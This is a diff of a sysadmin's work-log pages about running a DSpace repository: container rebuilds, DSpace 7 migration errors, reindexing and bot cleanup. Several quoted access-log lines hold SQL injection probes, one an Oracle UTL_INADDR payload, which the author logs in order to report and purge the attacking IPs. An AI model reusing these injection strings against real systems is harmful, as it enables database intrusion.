                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      • That’s 250 new items in the index since the last harvest!
                                                                                                                                                                                                                                                                                                                                      • Re-create my local Artifactory container because I’m getting errors starting it and it has been a few months since it was updated:
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                      $ podman rm artifactory
                                                                                                                                                                                                                                                                                                                                      -$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
                                                                                                                                                                                                                                                                                                                                      -$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
                                                                                                                                                                                                                                                                                                                                      -$ podman start artifactory
                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                        $ podman rm artifactory
                                                                                                                                                                                                                                                                                                                                        +$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
                                                                                                                                                                                                                                                                                                                                        +$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
                                                                                                                                                                                                                                                                                                                                        +$ podman start artifactory
                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                        • Start testing DSpace 7.0 Beta 5 so I can evaluate if it solves some of the problems we are having on DSpace 6, and if it’s missing things like multiple handle resolvers, etc
                                                                                                                                                                                                                                                                                                                                          • I see it needs Java JDK 11, Tomcat 9, Solr 8, and PostgreSQL 11
                                                                                                                                                                                                                                                                                                                                          • @@ -925,83 +925,83 @@ $ podman start artifactory
                                                                                                                                                                                                                                                                                                                                          • I tried to delete all the Atmire SQL migrations:
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          localhost/dspace7b5= > DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            localhost/dspace7b5= > DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            • But I got an error when running dspace database migrate:
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            $ ~/dspace7b5/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            -Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                            -Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                            -Migration exception:
                                                                                                                                                                                                                                                                                                                                            -java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                            -        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                            -Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 5.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 6.0.2017.01.30
                                                                                                                                                                                                                                                                                                                                            -Detected applied migration not resolved locally: 6.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
                                                                                                                                                                                                                                                                                                                                            -        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                            -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
                                                                                                                                                                                                                                                                                                                                            -        ... 9 more
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ~/dspace7b5/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                              +Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                              +Migration exception:
                                                                                                                                                                                                                                                                                                                                              +java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                              +        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                              +Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 5.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 6.0.2017.01.30
                                                                                                                                                                                                                                                                                                                                              +Detected applied migration not resolved locally: 6.0.2017.09.25
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
                                                                                                                                                                                                                                                                                                                                              +        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
                                                                                                                                                                                                                                                                                                                                              +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
                                                                                                                                                                                                                                                                                                                                              +        ... 9 more
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              • I deleted those migrations:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              localhost/dspace7b5= > DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                localhost/dspace7b5= > DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                • Then when I ran the migration again it failed for a new reason, related to the configurable workflow:
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                                -Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                                -Migration exception:
                                                                                                                                                                                                                                                                                                                                                -java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                -        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                                -Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
                                                                                                                                                                                                                                                                                                                                                -Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
                                                                                                                                                                                                                                                                                                                                                ---------------------------------------------------------------------
                                                                                                                                                                                                                                                                                                                                                -SQL State  : 42P01
                                                                                                                                                                                                                                                                                                                                                -Error Code : 0
                                                                                                                                                                                                                                                                                                                                                -Message    : ERROR: relation "cwf_pooltask" does not exist
                                                                                                                                                                                                                                                                                                                                                -  Position: 8
                                                                                                                                                                                                                                                                                                                                                -Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
                                                                                                                                                                                                                                                                                                                                                -Line       : 16
                                                                                                                                                                                                                                                                                                                                                -Statement  : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE workflow_id='default'
                                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  Database URL: jdbc:postgresql://localhost:5432/dspace7b5
                                                                                                                                                                                                                                                                                                                                                  +Migrating database to latest version... (Check dspace logs for details)
                                                                                                                                                                                                                                                                                                                                                  +Migration exception:
                                                                                                                                                                                                                                                                                                                                                  +java.sql.SQLException: Flyway migration error occurred
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                                                                                                                                                                                                                                                                                  +        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
                                                                                                                                                                                                                                                                                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
                                                                                                                                                                                                                                                                                                                                                  +Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
                                                                                                                                                                                                                                                                                                                                                  +Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
                                                                                                                                                                                                                                                                                                                                                  +--------------------------------------------------------------------
                                                                                                                                                                                                                                                                                                                                                  +SQL State  : 42P01
                                                                                                                                                                                                                                                                                                                                                  +Error Code : 0
                                                                                                                                                                                                                                                                                                                                                  +Message    : ERROR: relation "cwf_pooltask" does not exist
                                                                                                                                                                                                                                                                                                                                                  +  Position: 8
                                                                                                                                                                                                                                                                                                                                                  +Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
                                                                                                                                                                                                                                                                                                                                                  +Line       : 16
                                                                                                                                                                                                                                                                                                                                                  +Statement  : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE workflow_id='default'
                                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  $ ~/dspace7b5/bin/dspace database migrate ignored
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    $ ~/dspace7b5/bin/dspace database migrate ignored
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • Now I see all migrations have completed and DSpace actually starts up fine!
                                                                                                                                                                                                                                                                                                                                                    • I will try to do a full re-index to see how long it takes:
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                    $ time ~/dspace7b5/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                                    -~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      $ time ~/dspace7b5/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                                                      +~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      • Not good, that shit took almost seven hours!

                                                                                                                                                                                                                                                                                                                                                      2021-04-27

                                                                                                                                                                                                                                                                                                                                                      @@ -1012,9 +1012,9 @@ Statement : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  $ csvgrep -e 'windows-1252' -c 'Handle.net IDs' -i -m '10568/' ~/Downloads/Altmetric\ -\ Research\ Outputs\ -\ CGSpace\ -\ 2021-04-26.csv | csvcut -c DOI | sed '1d' > /tmp/dois.txt
                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    $ csvgrep -e 'windows-1252' -c 'Handle.net IDs' -i -m '10568/' ~/Downloads/Altmetric\ -\ Research\ Outputs\ -\ CGSpace\ -\ 2021-04-26.csv | csvcut -c DOI | sed '1d' > /tmp/dois.txt
                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • He will Tweet them…

                                                                                                                                                                                                                                                                                                                                                    2021-04-28

                                                                                                                                                                                                                                                                                                                                                    diff --git a/docs/2021-05/index.html b/docs/2021-05/index.html index c285cb5a6..29b2abd88 100644 --- a/docs/2021-05/index.html +++ b/docs/2021-05/index.html @@ -36,7 +36,7 @@ I looked at the top user agents and IPs in the Solr statistics for last month an I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user… "/> - + @@ -147,17 +147,17 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata-21%2B21*01 HTTP/1.1" 200 458201 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'||lower('')||' HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'%2Brtrim('')%2B' HTTP/1.1" 200 458209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata-21%2B21*01 HTTP/1.1" 200 458201 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'||lower('')||' HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'%2Brtrim('')%2B' HTTP/1.1" 200 458209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  • I will report the IP on abuseipdb.com and purge their hits from Solr
                                                                                                                                                                                                                                                                                                                                                  • The second IP is in Colombia and is making thousands of requests for what looks like some test site:
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                  181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                  -181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    +181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                    • But this site does not exist (yet?)
                                                                                                                                                                                                                                                                                                                                                      • I will purge them from Solr
                                                                                                                                                                                                                                                                                                                                                      • @@ -165,46 +165,46 @@ I will add the RI/1.0 pattern to our DSpace agents overload and purge them from
                                                                                                                                                                                                                                                                                                                                                      • The third IP is in Russia apparently, and the user agent has the pl-PL locale with thousands of requests like this:
                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                      45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] "GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y HTTP/1.1" 200 918998 "http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] "GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y HTTP/1.1" 200 918998 "http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        • I will purge these all with my check-spider-ip-hits.sh script:
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                        -Purging 21648 hits from 193.169.254.178 in statistics
                                                                                                                                                                                                                                                                                                                                                        -Purging 20323 hits from 181.62.166.177 in statistics
                                                                                                                                                                                                                                                                                                                                                        -Purging 19376 hits from 45.146.166.180 in statistics
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 61347
                                                                                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                                                                                        2021-05-02

                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
                                                                                                                                                                                                                                                                                                                                                        +Purging 21648 hits from 193.169.254.178 in statistics
                                                                                                                                                                                                                                                                                                                                                        +Purging 20323 hits from 181.62.166.177 in statistics
                                                                                                                                                                                                                                                                                                                                                        +Purging 19376 hits from 45.146.166.180 in statistics
                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                        +Total number of bot hits purged: 61347
                                                                                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                                                                                        2021-05-02

                                                                                                                                                                                                                                                                                                                                                        • Check the AReS Harvester indexes:
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                                        -$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                        -...
                                                                                                                                                                                                                                                                                                                                                        -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                        -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                        -    },
                                                                                                                                                                                                                                                                                                                                                        -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                                        -        "aliases": {
                                                                                                                                                                                                                                                                                                                                                        -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                                        -        }
                                                                                                                                                                                                                                                                                                                                                        -    },
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                                          +$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                                          +...
                                                                                                                                                                                                                                                                                                                                                          +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                                          +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                                          +    },
                                                                                                                                                                                                                                                                                                                                                          +    "openrxv-items-final": {
